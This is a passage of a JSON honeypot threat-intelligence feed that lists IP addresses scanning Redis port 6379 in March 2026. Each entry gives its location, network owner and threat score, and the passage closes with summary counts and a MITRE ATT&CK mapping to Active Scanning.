      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 39.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 16.2,
        "persistence": 10.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 42,
        "days_active_30d": 13,
        "ports_targeted_30d": 38,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-12T01:56:31.820000+00:00",
        "last_seen_30d": "2026-03-24T18:20:54.124000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 42
      }
    },
    "66.116.210.131": {
      "attack_count": 5,
      "first_seen": "2026-03-21T04:58:49.000Z",
      "last_seen": "2026-03-21T04:59:53.357Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 31898,
      "as_org": "Oracle Corporation",
      "threat_score": 5.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-21T04:59:53.357000+00:00",
        "last_seen_30d": "2026-03-21T04:59:53.357000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "66.132.195.145": {
      "attack_count": 5,
      "first_seen": "2026-03-31T02:57:20.000Z",
      "last_seen": "2026-03-31T02:58:36.581Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 54.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 22.0,
        "persistence": 7.5,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 158,
        "days_active_30d": 9,
        "ports_targeted_30d": 148,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-23T18:17:53.198000+00:00",
        "last_seen_30d": "2026-03-31T17:48:22.969000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 158
      }
    },
    "66.132.224.29": {
      "attack_count": 5,
      "first_seen": "2026-03-21T18:06:09.000Z",
      "last_seen": "2026-03-21T18:07:11.229Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": null,
      "as_org": null,
      "threat_score": 49.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.9,
        "persistence": 10.0,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 31,
        "days_active_30d": 12,
        "ports_targeted_30d": 30,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-20T23:19:39.033000+00:00",
        "last_seen_30d": "2026-03-31T08:06:59.506000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 31
      }
    },
    "85.239.245.254": {
      "attack_count": 5,
      "first_seen": "2026-03-05T03:33:44.000Z",
      "last_seen": "2026-03-05T03:34:53.437Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "St Louis",
      "asn": 40021,
      "as_org": "Contabo Inc.",
      "threat_score": 1.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T03:34:53.437000+00:00",
        "last_seen_30d": "2026-03-05T03:34:53.437000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "146.185.94.123": {
      "attack_count": 4,
      "first_seen": "2026-03-27T00:34:02.000Z",
      "last_seen": "2026-03-27T00:35:08.403Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Switzerland",
      "country_code": "CH",
      "city": "Uzwil",
      "asn": 211174,
      "as_org": "St. Gallisch-Appenzellische Kraftwerke AG",
      "threat_score": 6.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-27T00:35:08.403000+00:00",
        "last_seen_30d": "2026-03-27T00:35:08.403000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "184.105.247.238": {
      "attack_count": 4,
      "first_seen": "2026-03-04T13:55:04.000Z",
      "last_seen": "2026-03-04T13:56:06.160Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 78.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 18.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 67,
        "days_active_30d": 30,
        "ports_targeted_30d": 52,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T01:17:51.076000+00:00",
        "last_seen_30d": "2026-03-31T09:22:38.713000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 64,
        "Honeytrap": 2,
        "Miniprint": 1
      }
    },
    "65.49.1.110": {
      "attack_count": 4,
      "first_seen": "2026-03-28T13:37:17.000Z",
      "last_seen": "2026-03-28T13:38:24.216Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 75.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 13.8,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 26,
        "ports_targeted_30d": 14,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-06T00:12:42.859000+00:00",
        "last_seen_30d": "2026-03-31T12:08:41.217000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 20,
        "Honeytrap": 2,
        "ConPot": 1,
        "H0neytr4p": 1
      }
    },
    "113.209.196.69": {
      "attack_count": 18,
      "first_seen": "2026-03-29T04:23:45.000Z",
      "last_seen": "2026-03-31T15:25:37.135Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4808,
      "as_org": "China Unicom Beijing Province Network",
      "threat_score": 23.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 2.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 3,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-29T04:23:45+00:00",
        "last_seen_30d": "2026-03-31T15:25:37.135000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "20.169.81.226": {
      "attack_count": 15,
      "first_seen": "2026-03-14T22:49:31.000Z",
      "last_seen": "2026-03-14T22:52:51.988Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 70.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 13.4,
        "persistence": 25,
        "diversity": 12,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 30,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T09:23:32.466000+00:00",
        "last_seen_30d": "2026-03-31T09:14:20.978000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 16,
        "Redishoneypot": 3,
        "Dionaea": 2,
        "Honeytrap": 1
      }
    },
    "100.51.6.16": {
      "attack_count": 9,
      "first_seen": "2026-03-02T13:01:06.000Z",
      "last_seen": "2026-03-13T19:31:29.745Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 88.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 198,
        "days_active_30d": 30,
        "ports_targeted_30d": 79,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T00:57:32.769000+00:00",
        "last_seen_30d": "2026-03-31T22:10:16.090000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 170,
        "Honeytrap": 24,
        "ConPot": 3,
        "Dionaea": 1
      }
    },
    "216.218.206.122": {
      "attack_count": 4,
      "first_seen": "2026-03-29T09:54:09.000Z",
      "last_seen": "2026-03-29T09:55:12.453Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cazadero",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 52.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.8,
        "persistence": 16.7,
        "diversity": 18,
        "spread": 10,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 15,
        "days_active_30d": 20,
        "ports_targeted_30d": 9,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-10T10:08:16.459000+00:00",
        "last_seen_30d": "2026-03-29T09:55:12.453000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 13,
        "Ciscoasa": 2
      }
    }
  },
  "x_nadsec_summary": {
    "top_countries": {
      "United States": 8696,
      "Netherlands": 4990,
      "China": 4632,
      "Hong Kong": 2636,
      "Germany": 1479,
      "Russia": 594,
      "Canada": 389,
      "Seychelles": 238,
      "India": 208,
      "The Netherlands": 182,
      "France": 161,
      "United Kingdom": 153,
      "Vietnam": 151,
      "Singapore": 134,
      "Romania": 133,
      "Australia": 130,
      "South Korea": 126,
      "Indonesia": 80,
      "Brazil": 80,
      "United Arab Emirates": 77
    },
    "top_asns": {
      "Alsycon B.V.": 5296,
      "Amazon.com, Inc.": 3130,
      "UCLOUD INFORMATION TECHNOLOGY HK LIMITED": 2651,
      "DigitalOcean, LLC": 1621,
      "Hangzhou Alibaba Advertising Co.,Ltd.": 1509,
      "Microsoft Corporation": 1395,
      "Pfcloud UG (haftungsbeschrankt)": 1080,
      "Hurricane Electric LLC": 847,
      "Censys, Inc.": 652,
      "CHINA UNICOM China169 Backbone": 625,
      "Chinanet": 422,
      "Beijing Baidu Netcom Science and Technology Co., Ltd.": 355,
      "JSC Buduschee": 337,
      "Google LLC": 320,
      "ONYPHE SAS": 293,
      "China Telecom Group": 285,
      "China Mobile Communications Group Co., Ltd.": 237,
      "IP Volume inc": 232,
      "CariNet, Inc.": 226,
      "Shenzhen Tencent Computer Systems Company Limited": 194
    },
    "targeted_ports": {
      "6379": 780
    },
    "top_commands": {},
    "attack_types": {
      "scanning": 25796
    }
  },
  "x_mitre_attack": {
    "techniques": {
      "T1595": {
        "name": "Active Scanning",
        "tactic": "Reconnaissance",
        "ip_count": 780,
        "attack_types": [
          "scanning"
        ]
      }
    },
    "tactic_summary": {
      "Reconnaissance": 780
    },
    "technique_count": 1,
    "primary_tactics": [
      "Reconnaissance"
    ]
  },
  "x_nadsec_threat_summary": {
    "total_ips": 780,
    "scored_ips": 780,
    "threat_distribution": {
      "critical": 118,
      "high": 128,
      "medium": 131,
      "low": 139,
      "minimal": 264,
      "unknown": 0
    },
    "avg_threat_score": 41.6,
    "max_threat_score": 100,
    "top_threats": [
      {
        "ip": "3.132.26.232",
        "threat_score": 100,
        "threat_level": "critical",
        "total_events": 195,
        "country": "United States",
        "org": "Amazon.com, Inc."
      },
      {
        "ip": "45.91.64.6",
        "threat_score": 100,
        "threat_level": "critical",
        "total_events": 167,
        "country": "Russia",
        "org": "JSC Buduschee"
      },
      {
        "ip": "16.58.56.214",
        "threat_score": 100,
        "threat_level": "critical",
        "total_events": 474,
        "country": "United States",
        "org": "Amazon.com, Inc."
      },
      {
        "ip": "18.116.101.220",
        "threat_score": 100,
        "threat_level": "critical",
        "total_events": 412,
        "country": "United States",
        "org": "Amazon.com, Inc."
      },
      {
        "ip": "18.218.118.203",
        "threat_score": 100,
        "threat_level": "critical",
        "total_events": 368,
        "country": "United States",
        "org": "Amazon.com, Inc."
      },
      {
        "ip": "3.131.220.121",
        "threat_score": 100,
        "threat_level": "critical",
        "total_events": 198,
        "country": "United States",
        "org": "Amazon.com, Inc."
      },
      {
        "ip": "3.130.168.2",
        "threat_score": 100,
        "threat_level": "critical",
        "total_events": 379,
        "country": "United States",
        "org": "Amazon.com, Inc."
      },
      {
        "ip": "45.205.1.110",
        "threat_score": 100,
        "threat_level": "critical",
        "total_events": 95,
        "country": "United States",
        "org": "Vpsvault.host Ltd"
      },
      {
        "ip": "3.129.187.38",
        "threat_score": 100,
        "threat_level": "critical",
        "total_events": 398,
        "country": "United States",
        "org": "Amazon.com, Inc."
      },
      {
        "ip": "160.119.76.200",
        "threat_score": 99.2,
        "threat_level": "critical",
        "total_events": 17,
        "country": "Seychelles",
        "org": "Alsycon B.V."
      },
      {
        "ip": "3.134.216.108",
        "threat_score": 99.2,
        "threat_level": "critical",
        "total_events": 177,
        "country": "United States",
        "org": "Amazon.com, Inc."
      },
      {
        "ip": "5.101.64.6",
        "threat_score": 98.6,
        "threat_level": "critical",
        "total_events": 26,
        "country": "Russia",
        "org": "Petersburg Internet Network ltd."
      },
      {
        "ip": "85.217.140.37",
        "threat_score": 97.8,
        "threat_level": "critical",
        "total_events": 10,
        "country": "France",
        "org": "Modat B.V."
      },
      {
        "ip": "95.215.0.144",
        "threat_score": 97.6,
        "threat_level": "critical",
        "total_events": 25,
        "country": "Russia",
        "org": "Petersburg Internet Network ltd."
      },
      {
        "ip": "3.151.241.153",
        "threat_score": 97.5,
        "threat_level": "critical",
        "total_events": 122,
        "country": "United States",
        "org": "Amazon.com, Inc."
      },
      {
        "ip": "194.164.107.6",
        "threat_score": 97.2,
        "threat_level": "critical",
        "total_events": 20,
        "country": "United States",
        "org": "Valence Technology Co."
      },
      {
        "ip": "65.49.20.67",
        "threat_score": 97.0,
        "threat_level": "critical",
        "total_events": 26,
        "country": "United States",
        "org": "Hurricane Electric LLC"
      },
      {
        "ip": "71.6.199.23",
        "threat_score": 96.9,
        "threat_level": "critical",
        "total_events": 17,
        "country": "United States",
        "org": "CariNet, Inc."
      },
      {
        "ip": "86.54.31.34",
        "threat_score": 96.7,
        "threat_level": "critical",
        "total_events": 17,
        "country": "Canada",
        "org": "Black HOST Ltd"
      },
      {
        "ip": "65.49.20.69",
        "threat_score": 96.3,
        "threat_level": "critical",
        "total_events": 26,
        "country": "United States",
        "org": "Hurricane Electric LLC"
      }
    ]
  }
}